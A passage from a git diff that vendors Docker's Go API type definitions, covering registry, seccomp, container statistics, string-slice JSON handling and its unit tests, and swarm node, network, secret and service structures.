operation` +// +// See hack/swagger-gen.sh +// ---------------------------------------------------------------------------- + +// AuthenticateOKBody authenticate o k body +// swagger:model AuthenticateOKBody +type AuthenticateOKBody struct { + + // An opaque token used to authenticate a user after a successful login + // Required: true + IdentityToken string `json:"IdentityToken"` + + // The status of the authentication + // Required: true + Status string `json:"Status"` +} diff --git a/vendor/github.com/docker/docker/api/types/registry/registry.go b/vendor/github.com/docker/docker/api/types/registry/registry.go new file mode 100644 index 0000000000..28fafab901 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/registry/registry.go @@ -0,0 +1,104 @@ +package registry + +import ( + "encoding/json" + "net" +) + +// ServiceConfig stores daemon registry services configuration. +type ServiceConfig struct { + InsecureRegistryCIDRs []*NetIPNet `json:"InsecureRegistryCIDRs"` + IndexConfigs map[string]*IndexInfo `json:"IndexConfigs"` + Mirrors []string +} + +// NetIPNet is the net.IPNet type, which can be marshalled and +// unmarshalled to JSON +type NetIPNet net.IPNet + +// String returns the CIDR notation of ipnet +func (ipnet *NetIPNet) String() string { + return (*net.IPNet)(ipnet).String() +} + +// MarshalJSON returns the JSON representation of the IPNet +func (ipnet *NetIPNet) MarshalJSON() ([]byte, error) { + return json.Marshal((*net.IPNet)(ipnet).String()) +} + +// UnmarshalJSON sets the IPNet from a byte array of JSON +func (ipnet *NetIPNet) UnmarshalJSON(b []byte) (err error) { + var ipnetStr string + if err = json.Unmarshal(b, &ipnetStr); err == nil { + var cidr *net.IPNet + if _, cidr, err = net.ParseCIDR(ipnetStr); err == nil { + *ipnet = NetIPNet(*cidr) + } + } + return +} + +// IndexInfo contains information about a registry +// +// RepositoryInfo Examples: +// { +// "Index" : { +// "Name" : "docker.io", +// "Mirrors" : ["https://registry-2.docker.io/v1/", "https://registry-3.docker.io/v1/"], +// "Secure" : true, +// "Official" : true, +// }, +// "RemoteName" : "library/debian", +// "LocalName" : "debian", +// "CanonicalName" : "docker.io/debian" +// "Official" : true, +// } +// +// { +// "Index" : { +// "Name" : "127.0.0.1:5000", +// "Mirrors" : [], +// "Secure" : false, +// "Official" : false, +// }, +// "RemoteName" : "user/repo", +// "LocalName" : "127.0.0.1:5000/user/repo", +// "CanonicalName" : "127.0.0.1:5000/user/repo", +// "Official" : false, +// } +type IndexInfo struct { + // Name is the name of the registry, such as "docker.io" + Name string + // Mirrors is a list of mirrors, expressed as URIs + Mirrors []string + // Secure is set to false if the registry is part of the list of + // insecure registries. Insecure registries accept HTTP and/or accept + // HTTPS with certificates from unknown CAs. + Secure bool + // Official indicates whether this is an official registry + Official bool +} + +// SearchResult describes a search result returned from a registry +type SearchResult struct { + // StarCount indicates the number of stars this repository has + StarCount int `json:"star_count"` + // IsOfficial is true if the result is from an official repository. + IsOfficial bool `json:"is_official"` + // Name is the name of the repository + Name string `json:"name"` + // IsAutomated indicates whether the result is automated + IsAutomated bool `json:"is_automated"` + // Description is a textual description of the repository + Description string `json:"description"` +} + +// SearchResults lists a collection search results returned from a registry +type SearchResults struct { + // Query contains the query string that generated the search results + Query string `json:"query"` + // NumResults indicates the number of results the query returned + NumResults int `json:"num_results"` + // Results is a slice containing the actual results for the search + Results []SearchResult `json:"results"` +} diff --git a/vendor/github.com/docker/docker/api/types/seccomp.go b/vendor/github.com/docker/docker/api/types/seccomp.go new file mode 100644 index 0000000000..4f02ef36b8 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/seccomp.go @@ -0,0 +1,93 @@ +package types + +// Seccomp represents the config for a seccomp profile for syscall restriction. +type Seccomp struct { + DefaultAction Action `json:"defaultAction"` + // Architectures is kept to maintain backward compatibility with the old + // seccomp profile. + Architectures []Arch `json:"architectures,omitempty"` + ArchMap []Architecture `json:"archMap,omitempty"` + Syscalls []*Syscall `json:"syscalls"` +} + +// Architecture is used to represent an specific architecture +// and its sub-architectures +type Architecture struct { + Arch Arch `json:"architecture"` + SubArches []Arch `json:"subArchitectures"` +} + +// Arch used for architectures +type Arch string + +// Additional architectures permitted to be used for system calls +// By default only the native architecture of the kernel is permitted +const ( + ArchX86 Arch = "SCMP_ARCH_X86" + ArchX86_64 Arch = "SCMP_ARCH_X86_64" + ArchX32 Arch = "SCMP_ARCH_X32" + ArchARM Arch = "SCMP_ARCH_ARM" + ArchAARCH64 Arch = "SCMP_ARCH_AARCH64" + ArchMIPS Arch = "SCMP_ARCH_MIPS" + ArchMIPS64 Arch = "SCMP_ARCH_MIPS64" + ArchMIPS64N32 Arch = "SCMP_ARCH_MIPS64N32" + ArchMIPSEL Arch = "SCMP_ARCH_MIPSEL" + ArchMIPSEL64 Arch = "SCMP_ARCH_MIPSEL64" + ArchMIPSEL64N32 Arch = "SCMP_ARCH_MIPSEL64N32" + ArchPPC Arch = "SCMP_ARCH_PPC" + ArchPPC64 Arch = "SCMP_ARCH_PPC64" + ArchPPC64LE Arch = "SCMP_ARCH_PPC64LE" + ArchS390 Arch = "SCMP_ARCH_S390" + ArchS390X Arch = "SCMP_ARCH_S390X" +) + +// Action taken upon Seccomp rule match +type Action string + +// Define actions for Seccomp rules +const ( + ActKill Action = "SCMP_ACT_KILL" + ActTrap Action = "SCMP_ACT_TRAP" + ActErrno Action = "SCMP_ACT_ERRNO" + ActTrace Action = "SCMP_ACT_TRACE" + ActAllow Action = "SCMP_ACT_ALLOW" +) + +// Operator used to match syscall arguments in Seccomp +type Operator string + +// Define operators for syscall arguments in Seccomp +const ( + OpNotEqual Operator = "SCMP_CMP_NE" + OpLessThan Operator = "SCMP_CMP_LT" + OpLessEqual Operator = "SCMP_CMP_LE" + OpEqualTo Operator = "SCMP_CMP_EQ" + OpGreaterEqual Operator = "SCMP_CMP_GE" + OpGreaterThan Operator = "SCMP_CMP_GT" + OpMaskedEqual Operator = "SCMP_CMP_MASKED_EQ" +) + +// Arg used for matching specific syscall arguments in Seccomp +type Arg struct { + Index uint `json:"index"` + Value uint64 `json:"value"` + ValueTwo uint64 `json:"valueTwo"` + Op Operator `json:"op"` +} + +// Filter is used to conditionally apply Seccomp rules +type Filter struct { + Caps []string `json:"caps,omitempty"` + Arches []string `json:"arches,omitempty"` +} + +// Syscall is used to match a group of syscalls in Seccomp +type Syscall struct { + Name string `json:"name,omitempty"` + Names []string `json:"names,omitempty"` + Action Action `json:"action"` + Args []*Arg `json:"args"` + Comment string `json:"comment"` + Includes Filter `json:"includes"` + Excludes Filter `json:"excludes"` +} diff --git a/vendor/github.com/docker/docker/api/types/service_update_response.go b/vendor/github.com/docker/docker/api/types/service_update_response.go new file mode 100644 index 0000000000..74ea64b1bb --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/service_update_response.go @@ -0,0 +1,12 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// ServiceUpdateResponse service update response +// swagger:model ServiceUpdateResponse +type ServiceUpdateResponse struct { + + // Optional warning messages + Warnings []string `json:"Warnings"` +} diff --git a/vendor/github.com/docker/docker/api/types/stats.go b/vendor/github.com/docker/docker/api/types/stats.go new file mode 100644 index 0000000000..9bf1928b8c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/stats.go @@ -0,0 +1,178 @@ +// Package types is used for API stability in the types and response to the +// consumers of the API stats endpoint. +package types + +import "time" + +// ThrottlingData stores CPU throttling stats of one running container. +// Not used on Windows. +type ThrottlingData struct { + // Number of periods with throttling active + Periods uint64 `json:"periods"` + // Number of periods when the container hits its throttling limit. + ThrottledPeriods uint64 `json:"throttled_periods"` + // Aggregate time the container was throttled for in nanoseconds. + ThrottledTime uint64 `json:"throttled_time"` +} + +// CPUUsage stores All CPU stats aggregated since container inception. +type CPUUsage struct { + // Total CPU time consumed. + // Units: nanoseconds (Linux) + // Units: 100's of nanoseconds (Windows) + TotalUsage uint64 `json:"total_usage"` + + // Total CPU time consumed per core (Linux). Not used on Windows. + // Units: nanoseconds. + PercpuUsage []uint64 `json:"percpu_usage,omitempty"` + + // Time spent by tasks of the cgroup in kernel mode (Linux). + // Time spent by all container processes in kernel mode (Windows). + // Units: nanoseconds (Linux). + // Units: 100's of nanoseconds (Windows). Not populated for Hyper-V Containers. + UsageInKernelmode uint64 `json:"usage_in_kernelmode"` + + // Time spent by tasks of the cgroup in user mode (Linux). + // Time spent by all container processes in user mode (Windows). + // Units: nanoseconds (Linux). + // Units: 100's of nanoseconds (Windows). Not populated for Hyper-V Containers + UsageInUsermode uint64 `json:"usage_in_usermode"` +} + +// CPUStats aggregates and wraps all CPU related info of container +type CPUStats struct { + // CPU Usage. Linux and Windows. + CPUUsage CPUUsage `json:"cpu_usage"` + + // System Usage. Linux only. + SystemUsage uint64 `json:"system_cpu_usage,omitempty"` + + // Throttling Data. Linux only. + ThrottlingData ThrottlingData `json:"throttling_data,omitempty"` +} + +// MemoryStats aggregates all memory stats since container inception on Linux. +// Windows returns stats for commit and private working set only. +type MemoryStats struct { + // Linux Memory Stats + + // current res_counter usage for memory + Usage uint64 `json:"usage,omitempty"` + // maximum usage ever recorded. + MaxUsage uint64 `json:"max_usage,omitempty"` + // TODO(vishh): Export these as stronger types. + // all the stats exported via memory.stat. + Stats map[string]uint64 `json:"stats,omitempty"` + // number of times memory usage hits limits. + Failcnt uint64 `json:"failcnt,omitempty"` + Limit uint64 `json:"limit,omitempty"` + + // Windows Memory Stats + // See https://technet.microsoft.com/en-us/magazine/ff382715.aspx + + // committed bytes + Commit uint64 `json:"commitbytes,omitempty"` + // peak committed bytes + CommitPeak uint64 `json:"commitpeakbytes,omitempty"` + // private working set + PrivateWorkingSet uint64 `json:"privateworkingset,omitempty"` +} + +// BlkioStatEntry is one small entity to store a piece of Blkio stats +// Not used on Windows. +type BlkioStatEntry struct { + Major uint64 `json:"major"` + Minor uint64 `json:"minor"` + Op string `json:"op"` + Value uint64 `json:"value"` +} + +// BlkioStats stores All IO service stats for data read and write. +// This is a Linux specific structure as the differences between expressing +// block I/O on Windows and Linux are sufficiently significant to make +// little sense attempting to morph into a combined structure. +type BlkioStats struct { + // number of bytes transferred to and from the block device + IoServiceBytesRecursive []BlkioStatEntry `json:"io_service_bytes_recursive"` + IoServicedRecursive []BlkioStatEntry `json:"io_serviced_recursive"` + IoQueuedRecursive []BlkioStatEntry `json:"io_queue_recursive"` + IoServiceTimeRecursive []BlkioStatEntry `json:"io_service_time_recursive"` + IoWaitTimeRecursive []BlkioStatEntry `json:"io_wait_time_recursive"` + IoMergedRecursive []BlkioStatEntry `json:"io_merged_recursive"` + IoTimeRecursive []BlkioStatEntry `json:"io_time_recursive"` + SectorsRecursive []BlkioStatEntry `json:"sectors_recursive"` +} + +// StorageStats is the disk I/O stats for read/write on Windows. +type StorageStats struct { + ReadCountNormalized uint64 `json:"read_count_normalized,omitempty"` + ReadSizeBytes uint64 `json:"read_size_bytes,omitempty"` + WriteCountNormalized uint64 `json:"write_count_normalized,omitempty"` + WriteSizeBytes uint64 `json:"write_size_bytes,omitempty"` +} + +// NetworkStats aggregates the network stats of one container +type NetworkStats struct { + // Bytes received. Windows and Linux. + RxBytes uint64 `json:"rx_bytes"` + // Packets received. Windows and Linux. + RxPackets uint64 `json:"rx_packets"` + // Received errors. Not used on Windows. Note that we dont `omitempty` this + // field as it is expected in the >=v1.21 API stats structure. + RxErrors uint64 `json:"rx_errors"` + // Incoming packets dropped. Windows and Linux. + RxDropped uint64 `json:"rx_dropped"` + // Bytes sent. Windows and Linux. + TxBytes uint64 `json:"tx_bytes"` + // Packets sent. Windows and Linux. + TxPackets uint64 `json:"tx_packets"` + // Sent errors. Not used on Windows. Note that we dont `omitempty` this + // field as it is expected in the >=v1.21 API stats structure. + TxErrors uint64 `json:"tx_errors"` + // Outgoing packets dropped. Windows and Linux. + TxDropped uint64 `json:"tx_dropped"` + // Endpoint ID. Not used on Linux. + EndpointID string `json:"endpoint_id,omitempty"` + // Instance ID. Not used on Linux. + InstanceID string `json:"instance_id,omitempty"` +} + +// PidsStats contains the stats of a container's pids +type PidsStats struct { + // Current is the number of pids in the cgroup + Current uint64 `json:"current,omitempty"` + // Limit is the hard limit on the number of pids in the cgroup. + // A "Limit" of 0 means that there is no limit. + Limit uint64 `json:"limit,omitempty"` +} + +// Stats is Ultimate struct aggregating all types of stats of one container +type Stats struct { + // Common stats + Read time.Time `json:"read"` + PreRead time.Time `json:"preread"` + + // Linux specific stats, not populated on Windows. + PidsStats PidsStats `json:"pids_stats,omitempty"` + BlkioStats BlkioStats `json:"blkio_stats,omitempty"` + + // Windows specific stats, not populated on Linux. + NumProcs uint32 `json:"num_procs"` + StorageStats StorageStats `json:"storage_stats,omitempty"` + + // Shared stats + CPUStats CPUStats `json:"cpu_stats,omitempty"` + PreCPUStats CPUStats `json:"precpu_stats,omitempty"` // "Pre"="Previous" + MemoryStats MemoryStats `json:"memory_stats,omitempty"` +} + +// StatsJSON is newly used Networks +type StatsJSON struct { + Stats + + Name string `json:"name,omitempty"` + ID string `json:"id,omitempty"` + + // Networks request version >=1.21 + Networks map[string]NetworkStats `json:"networks,omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice.go b/vendor/github.com/docker/docker/api/types/strslice/strslice.go new file mode 100644 index 0000000000..bad493fb89 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/strslice/strslice.go @@ -0,0 +1,30 @@ +package strslice + +import "encoding/json" + +// StrSlice represents a string or an array of strings. +// We need to override the json decoder to accept both options. +type StrSlice []string + +// UnmarshalJSON decodes the byte slice whether it's a string or an array of +// strings. This method is needed to implement json.Unmarshaler. +func (e *StrSlice) UnmarshalJSON(b []byte) error { + if len(b) == 0 { + // With no input, we preserve the existing value by returning nil and + // leaving the target alone. This allows defining default values for + // the type. + return nil + } + + p := make([]string, 0, 1) + if err := json.Unmarshal(b, &p); err != nil { + var s string + if err := json.Unmarshal(b, &s); err != nil { + return err + } + p = append(p, s) + } + + *e = p + return nil +} diff --git a/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go new file mode 100644 index 0000000000..1163b3652c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/strslice/strslice_test.go @@ -0,0 +1,86 @@ +package strslice + +import ( + "encoding/json" + "reflect" + "testing" +) + +func TestStrSliceMarshalJSON(t *testing.T) { + for _, testcase := range []struct { + input StrSlice + expected string + }{ + // MADNESS(stevvooe): No clue why nil would be "" but empty would be + // "null". Had to make a change here that may affect compatibility. + {input: nil, expected: "null"}, + {StrSlice{}, "[]"}, + {StrSlice{"/bin/sh", "-c", "echo"}, `["/bin/sh","-c","echo"]`}, + } { + data, err := json.Marshal(testcase.input) + if err != nil { + t.Fatal(err) + } + if string(data) != testcase.expected { + t.Fatalf("%#v: expected %v, got %v", testcase.input, testcase.expected, string(data)) + } + } +} + +func TestStrSliceUnmarshalJSON(t *testing.T) { + parts := map[string][]string{ + "": {"default", "values"}, + "[]": {}, + `["/bin/sh","-c","echo"]`: {"/bin/sh", "-c", "echo"}, + } + for json, expectedParts := range parts { + strs := StrSlice{"default", "values"} + if err := strs.UnmarshalJSON([]byte(json)); err != nil { + t.Fatal(err) + } + + actualParts := []string(strs) + if !reflect.DeepEqual(actualParts, expectedParts) { + t.Fatalf("%#v: expected %v, got %v", json, expectedParts, actualParts) + } + + } +} + +func TestStrSliceUnmarshalString(t *testing.T) { + var e StrSlice + echo, err := json.Marshal("echo") + if err != nil { + t.Fatal(err) + } + if err := json.Unmarshal(echo, &e); err != nil { + t.Fatal(err) + } + + if len(e) != 1 { + t.Fatalf("expected 1 element after unmarshal: %q", e) + } + + if e[0] != "echo" { + t.Fatalf("expected `echo`, got: %q", e[0]) + } +} + +func TestStrSliceUnmarshalSlice(t *testing.T) { + var e StrSlice + echo, err := json.Marshal([]string{"echo"}) + if err != nil { + t.Fatal(err) + } + if err := json.Unmarshal(echo, &e); err != nil { + t.Fatal(err) + } + + if len(e) != 1 { + t.Fatalf("expected 1 element after unmarshal: %q", e) + } + + if e[0] != "echo" { + t.Fatalf("expected `echo`, got: %q", e[0]) + } +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/common.go b/vendor/github.com/docker/docker/api/types/swarm/common.go new file mode 100644 index 0000000000..64a648bad1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/common.go @@ -0,0 +1,27 @@ +package swarm + +import "time" + +// Version represents the internal object version. +type Version struct { + Index uint64 `json:",omitempty"` +} + +// Meta is a base object inherited by most of the other once. +type Meta struct { + Version Version `json:",omitempty"` + CreatedAt time.Time `json:",omitempty"` + UpdatedAt time.Time `json:",omitempty"` +} + +// Annotations represents how to describe an object. +type Annotations struct { + Name string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` +} + +// Driver represents a driver (network, logging). +type Driver struct { + Name string `json:",omitempty"` + Options map[string]string `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/container.go b/vendor/github.com/docker/docker/api/types/swarm/container.go new file mode 100644 index 0000000000..4ab476ccc3 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/container.go @@ -0,0 +1,46 @@ +package swarm + +import ( + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/mount" +) + +// DNSConfig specifies DNS related configurations in resolver configuration file (resolv.conf) +// Detailed documentation is available in: +// http://man7.org/linux/man-pages/man5/resolv.conf.5.html +// `nameserver`, `search`, `options` have been supported. +// TODO: `domain` is not supported yet. +type DNSConfig struct { + // Nameservers specifies the IP addresses of the name servers + Nameservers []string `json:",omitempty"` + // Search specifies the search list for host-name lookup + Search []string `json:",omitempty"` + // Options allows certain internal resolver variables to be modified + Options []string `json:",omitempty"` +} + +// ContainerSpec represents the spec of a container. +type ContainerSpec struct { + Image string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + Command []string `json:",omitempty"` + Args []string `json:",omitempty"` + Hostname string `json:",omitempty"` + Env []string `json:",omitempty"` + Dir string `json:",omitempty"` + User string `json:",omitempty"` + Groups []string `json:",omitempty"` + TTY bool `json:",omitempty"` + OpenStdin bool `json:",omitempty"` + Mounts []mount.Mount `json:",omitempty"` + StopGracePeriod *time.Duration `json:",omitempty"` + Healthcheck *container.HealthConfig `json:",omitempty"` + // The format of extra hosts on swarmkit is specified in: + // http://man7.org/linux/man-pages/man5/hosts.5.html + // IP_address canonical_hostname [aliases...] + Hosts []string `json:",omitempty"` + DNSConfig *DNSConfig `json:",omitempty"` + Secrets []*SecretReference `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/network.go b/vendor/github.com/docker/docker/api/types/swarm/network.go new file mode 100644 index 0000000000..5a5e11bdba --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/network.go @@ -0,0 +1,111 @@ +package swarm + +// Endpoint represents an endpoint. +type Endpoint struct { + Spec EndpointSpec `json:",omitempty"` + Ports []PortConfig `json:",omitempty"` + VirtualIPs []EndpointVirtualIP `json:",omitempty"` +} + +// EndpointSpec represents the spec of an endpoint. +type EndpointSpec struct { + Mode ResolutionMode `json:",omitempty"` + Ports []PortConfig `json:",omitempty"` +} + +// ResolutionMode represents a resolution mode. +type ResolutionMode string + +const ( + // ResolutionModeVIP VIP + ResolutionModeVIP ResolutionMode = "vip" + // ResolutionModeDNSRR DNSRR + ResolutionModeDNSRR ResolutionMode = "dnsrr" +) + +// PortConfig represents the config of a port. +type PortConfig struct { + Name string `json:",omitempty"` + Protocol PortConfigProtocol `json:",omitempty"` + // TargetPort is the port inside the container + TargetPort uint32 `json:",omitempty"` + // PublishedPort is the port on the swarm hosts + PublishedPort uint32 `json:",omitempty"` + // PublishMode is the mode in which port is published + PublishMode PortConfigPublishMode `json:",omitempty"` +} + +// PortConfigPublishMode represents the mode in which the port is to +// be published. +type PortConfigPublishMode string + +const ( + // PortConfigPublishModeIngress is used for ports published + // for ingress load balancing using routing mesh. + PortConfigPublishModeIngress PortConfigPublishMode = "ingress" + // PortConfigPublishModeHost is used for ports published + // for direct host level access on the host where the task is running. + PortConfigPublishModeHost PortConfigPublishMode = "host" +) + +// PortConfigProtocol represents the protocol of a port. +type PortConfigProtocol string + +const ( + // TODO(stevvooe): These should be used generally, not just for PortConfig. + + // PortConfigProtocolTCP TCP + PortConfigProtocolTCP PortConfigProtocol = "tcp" + // PortConfigProtocolUDP UDP + PortConfigProtocolUDP PortConfigProtocol = "udp" +) + +// EndpointVirtualIP represents the virtual ip of a port. +type EndpointVirtualIP struct { + NetworkID string `json:",omitempty"` + Addr string `json:",omitempty"` +} + +// Network represents a network. +type Network struct { + ID string + Meta + Spec NetworkSpec `json:",omitempty"` + DriverState Driver `json:",omitempty"` + IPAMOptions *IPAMOptions `json:",omitempty"` +} + +// NetworkSpec represents the spec of a network. +type NetworkSpec struct { + Annotations + DriverConfiguration *Driver `json:",omitempty"` + IPv6Enabled bool `json:",omitempty"` + Internal bool `json:",omitempty"` + Attachable bool `json:",omitempty"` + IPAMOptions *IPAMOptions `json:",omitempty"` +} + +// NetworkAttachmentConfig represents the configuration of a network attachment. +type NetworkAttachmentConfig struct { + Target string `json:",omitempty"` + Aliases []string `json:",omitempty"` +} + +// NetworkAttachment represents a network attachment. +type NetworkAttachment struct { + Network Network `json:",omitempty"` + Addresses []string `json:",omitempty"` +} + +// IPAMOptions represents ipam options. +type IPAMOptions struct { + Driver Driver `json:",omitempty"` + Configs []IPAMConfig `json:",omitempty"` +} + +// IPAMConfig represents ipam configuration. +type IPAMConfig struct { + Subnet string `json:",omitempty"` + Range string `json:",omitempty"` + Gateway string `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/node.go b/vendor/github.com/docker/docker/api/types/swarm/node.go new file mode 100644 index 0000000000..379e17a779 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/node.go @@ -0,0 +1,114 @@ +package swarm + +// Node represents a node. +type Node struct { + ID string + Meta + // Spec defines the desired state of the node as specified by the user. + // The system will honor this and will *never* modify it. + Spec NodeSpec `json:",omitempty"` + // Description encapsulates the properties of the Node as reported by the + // agent. + Description NodeDescription `json:",omitempty"` + // Status provides the current status of the node, as seen by the manager. + Status NodeStatus `json:",omitempty"` + // ManagerStatus provides the current status of the node's manager + // component, if the node is a manager. + ManagerStatus *ManagerStatus `json:",omitempty"` +} + +// NodeSpec represents the spec of a node. +type NodeSpec struct { + Annotations + Role NodeRole `json:",omitempty"` + Availability NodeAvailability `json:",omitempty"` +} + +// NodeRole represents the role of a node. +type NodeRole string + +const ( + // NodeRoleWorker WORKER + NodeRoleWorker NodeRole = "worker" + // NodeRoleManager MANAGER + NodeRoleManager NodeRole = "manager" +) + +// NodeAvailability represents the availability of a node. +type NodeAvailability string + +const ( + // NodeAvailabilityActive ACTIVE + NodeAvailabilityActive NodeAvailability = "active" + // NodeAvailabilityPause PAUSE + NodeAvailabilityPause NodeAvailability = "pause" + // NodeAvailabilityDrain DRAIN + NodeAvailabilityDrain NodeAvailability = "drain" +) + +// NodeDescription represents the description of a node. +type NodeDescription struct { + Hostname string `json:",omitempty"` + Platform Platform `json:",omitempty"` + Resources Resources `json:",omitempty"` + Engine EngineDescription `json:",omitempty"` +} + +// Platform represents the platform (Arch/OS). +type Platform struct { + Architecture string `json:",omitempty"` + OS string `json:",omitempty"` +} + +// EngineDescription represents the description of an engine. +type EngineDescription struct { + EngineVersion string `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + Plugins []PluginDescription `json:",omitempty"` +} + +// PluginDescription represents the description of an engine plugin. +type PluginDescription struct { + Type string `json:",omitempty"` + Name string `json:",omitempty"` +} + +// NodeStatus represents the status of a node. +type NodeStatus struct { + State NodeState `json:",omitempty"` + Message string `json:",omitempty"` + Addr string `json:",omitempty"` +} + +// Reachability represents the reachability of a node. +type Reachability string + +const ( + // ReachabilityUnknown UNKNOWN + ReachabilityUnknown Reachability = "unknown" + // ReachabilityUnreachable UNREACHABLE + ReachabilityUnreachable Reachability = "unreachable" + // ReachabilityReachable REACHABLE + ReachabilityReachable Reachability = "reachable" +) + +// ManagerStatus represents the status of a manager. +type ManagerStatus struct { + Leader bool `json:",omitempty"` + Reachability Reachability `json:",omitempty"` + Addr string `json:",omitempty"` +} + +// NodeState represents the state of a node. +type NodeState string + +const ( + // NodeStateUnknown UNKNOWN + NodeStateUnknown NodeState = "unknown" + // NodeStateDown DOWN + NodeStateDown NodeState = "down" + // NodeStateReady READY + NodeStateReady NodeState = "ready" + // NodeStateDisconnected DISCONNECTED + NodeStateDisconnected NodeState = "disconnected" +) diff --git a/vendor/github.com/docker/docker/api/types/swarm/secret.go b/vendor/github.com/docker/docker/api/types/swarm/secret.go new file mode 100644 index 0000000000..fdb2388888 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/secret.go @@ -0,0 +1,31 @@ +package swarm + +import "os" + +// Secret represents a secret. +type Secret struct { + ID string + Meta + Spec SecretSpec +} + +// SecretSpec represents a secret specification from a secret in swarm +type SecretSpec struct { + Annotations + Data []byte `json:",omitempty"` +} + +// SecretReferenceFileTarget is a file target in a secret reference +type SecretReferenceFileTarget struct { + Name string + UID string + GID string + Mode os.FileMode +} + +// SecretReference is a reference to a secret in swarm +type SecretReference struct { + File *SecretReferenceFileTarget + SecretID string + SecretName string +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/service.go b/vendor/github.com/docker/docker/api/types/swarm/service.go new file mode 100644 index 0000000000..2cf2642c1f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/service.go @@ -0,0 +1,105 @@ +package swarm + +import "time" + +// Service represents a service. +type Service struct { + ID string + Meta + Spec ServiceSpec `json:",omitempty"` + PreviousSpec *ServiceSpec `json:",omitempty"` + Endpoint Endpoint `json:",omitempty"` + UpdateStatus UpdateStatus `json:",omitempty"` +} + +// ServiceSpec represents the spec of a service. +type ServiceSpec struct { + Annotations + + // TaskTemplate defines how the service should construct new tasks when + // orchestrating this service. + TaskTemplate TaskSpec `json:",omitempty"` + Mode ServiceMode `json:",omitempty"` + UpdateConfig *UpdateConfig `json:",omitempty"` + + // Networks field in ServiceSpec is deprecated. The + // same field in TaskSpec should be used instead. + // This field will be removed in a future release. + Networks []NetworkAttachmentConfig `json:",omitempty"` + EndpointSpec *EndpointSpec `json:",omitempty"` +} + +// ServiceMode represents the mode of a service. +type ServiceMode struct { + Replicated *ReplicatedService `json:",omitempty"` + Global *GlobalService `json:",omitempty"` +} + +// UpdateState is the state of a service update. +type UpdateState string + +const ( + // UpdateStateUpdating is the updating state. + UpdateStateUpdating UpdateState = "updating" + // UpdateStatePaused is the paused state. + UpdateStatePaused UpdateState = "paused" + // UpdateStateCompleted is the completed state. + UpdateStateCompleted UpdateState = "completed" +) + +// UpdateStatus reports the status of a service update. +type UpdateStatus struct { + State UpdateState `json:",omitempty"` + StartedAt time.Time `json:",omitempty"` + CompletedAt time.Time `json:",omitempty"` + Message string `json:",omitempty"` +} + +// ReplicatedService is a kind of ServiceMode. +type ReplicatedService struct { + Replicas *uint64 `json:",omitempty"` +} + +// GlobalService is a kind of ServiceMode. +type GlobalService struct{} + +const ( + // UpdateFailureActionPause PAUSE + UpdateFailureActionPause = "pause" + // UpdateFailureActionContinue CONTINUE + UpdateFailureActionContinue = "continue" +) + +// UpdateConfig represents the update configuration. +type UpdateConfig struct { + // Maximum number of tasks to be updated in one iteration. + // 0 means unlimited parallelism. + Parallelism uint64 + + // Amount of time between updates. + Delay time.Duration `json:",omitempty"` + + // FailureAction is the action to take when an update failures. + FailureAction string `json:",omitempty"` + + // Monitor indicates how long to monitor a task for failure after it is + // created. If the task fails by ending up in one of the states + // REJECTED, COMPLETED, or FAILED, within Monitor from its creation, + // this counts as a failure. If it fails after Monitor, it does not + // count as a failure. If Monitor is unspecified, a default value will + // be used. + Monitor time.Duration `json:",omitempty"` + + // MaxFailureRatio is the fraction of tasks that may fail during + // an update before the failure action is invoked. Any task created by + // the current update which ends up in one of the states REJECTED, + // COMPLETED or FAILED within Monitor from its creation counts as a + // failure. The number of failures is divided by the number of tasks + // being updated, and if this fraction is greater than + // MaxFailureRatio, the failure action is invoked. + // + // If the failure action is CONTINUE, there is no effect. + // If the failure action is PAUSE, no more tasks will be updated until + // another update is started. + MaxFailureRatio float32 +} diff --git a/vendor/github.com/docker/docker/api/types/swarm/swarm.go b/vendor/github.com/docker/docker/api/types/swarm/swarm.go new file mode 100644 index 0000000000..0b42219696 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/swarm/swarm.go @@ -0,0 +1,197 @@ +package swarm + +import "time" + +// ClusterInfo represents info about the cluster for outputing in "info" +// it contains the same information as "Swarm", but without the JoinTokens +type ClusterInfo struct { + ID string + Meta + Spec Spec +} + +// Swarm represents a swarm. +type Swarm struct { + ClusterInfo + JoinTokens JoinTokens +} + +// JoinTokens contains the tokens workers and managers need to join the swarm. +type JoinTokens struct { + // Worker is the join token workers may use to join the swarm. + Worker string + // Manager is the join token managers may use to join the swarm. + Manager string +} + +// Spec represents the spec of a swarm. +type Spec struct { + Annotations + + Orchestration OrchestrationConfig `json:",omitempty"` + Raft RaftConfig `json:",omitempty"` + Dispatcher DispatcherConfig `json:",omitempty"` + CAConfig CAConfig `json:",omitempty"` + TaskDefaults TaskDefaults `json:",omitempty"` + EncryptionConfig EncryptionConfig `json:",omitempty"` +} + +// OrchestrationConfig represents orchestration configuration. +type OrchestrationConfig struct { + // TaskHistoryRetentionLimit is the number of historic tasks to keep per instance or + // node. If negative, never remove completed or failed tasks. + TaskHistoryRetentionLimit *int64 `json:",omitempty"` +} + +// TaskDefaults parameterizes cluster-level task creation with default values. +type TaskDefaults struct { + // LogDriver selects the log driver to use for tasks created in the + // orchestrator if unspecified by a service. + // + // Updating this value will only have an affect on new tasks. Old tasks + // will continue use their previously configured log driver 